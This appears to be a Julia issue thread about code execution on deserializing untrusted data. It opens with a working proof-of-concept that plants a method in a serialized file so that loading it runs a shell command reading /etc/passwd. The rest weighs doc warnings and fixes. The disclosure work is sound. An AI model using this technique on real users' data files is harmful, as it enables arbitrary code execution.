Serialization of adversarial data is not intended to be secure. Python has a big banner that warns about this. We also have a little bit of a warning, but I think this should be more pronounced.
Similar issues in bson and jld2.
For your amusement, proof of concept exploit for stdlib deserialization:
julia> using Serialization
julia> Serialization.deserialize(s::Serializer, t::Type{BigInt})=run(`cat /etc/passwd`);
julia> filt=filter(methods(Serialization.deserialize).ms) do m
String(m.file)[1]=='R' end;
julia> Serialization.serialize("poc.serialized_jl", (filt[1], BigInt(7)));
In new Repl session on 1.1.1
:
julia> using Serialization
julia> Serialization.deserialize("poc.serialized_jl");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
[...]
On 1.3.0-DEV.511
the exploit is only triggered when we deserialize a second file containing BigInt
afterwards (or the same file twice). I think this is due to world age / invokelatest issues. The failure to trigger could be considered a bug: First sending executable code that helps unpack the remainder of a file is potentially a useful pattern. As such, we should decide whether this is supported.
So, just add
# Security Properties
None. Totally insecure.
?
I think the big red box in the python pickle docs is appropriate: "Warning The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.". That would go both on the function docstring and the module description.
Tangentially, I don't think the exact behavior exploited in the OP is necessary --- when we deserialize a Method
we also insert it into its table, but that seems redundant since we're also deserializing the table farther up the stack. It might be some sort of vestigial code. Removing it should make it much harder to execute arbitrary code just by deserializing data.
Removing it should make it much harder to execute arbitrary code just by deserializing data.
While I'm all for removing vestigal code, I don't think that we should actively try to make it harder to execute arbitrary code during deserialization.
Security against malicious data can be a design goal or not, and I don't see us sacrificing speed and convenience for this. Clear communication is the best we can do, and an easy-to-understand example (i.e. PoC exploit) goes a long way in explaining why deserialization of untrusted data is bad ("an exploit is proof-by-construction of surprising computational power").
Apart from the need for clearer warnings in the docs, this was the second reason for opening these related issues (code exec during deserialization in stdlib, BSON.jl
and JLD2.jl
; none of them vulnerabilities, but hopefully shedding more light on why deserialization is insecure in their respective approaches. The bson/jld2 exploit does not trigger during stdlib deserialization, but it does trigger on most ways of accessing the deserialized object, especially REPL printing).
The bson/jld2 exploit does not trigger during stdlib deserialization, but it does trigger on most ways of accessing the deserialized object, especially REPL printing).
The difference there is huge. Consider:
str = readline(file)
run(str)
That the language lets you do that is unavoidable --- not something we can address directly very easily. But if code execution happens on the first line, we probably want to do something about it.
I don't think that we should actively try to make it harder to execute arbitrary code during deserialization.
I do --- especially if the "feature" that enables it was unintentional in the first place. I think there are much better alternatives. For example, we could store a manifest in the data file. And/or if deserialization fails, we could print which packages it requires so you can try installing them.
Note that I'm fine with calling method overloads during deserialization, as long as they're loaded via the normal channels and not behind your back hidden in the data file.
Most helpful comment
I think the big red box in the python pickle docs is appropriate: "Warning The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.". That would go both on the function docstring and the module description.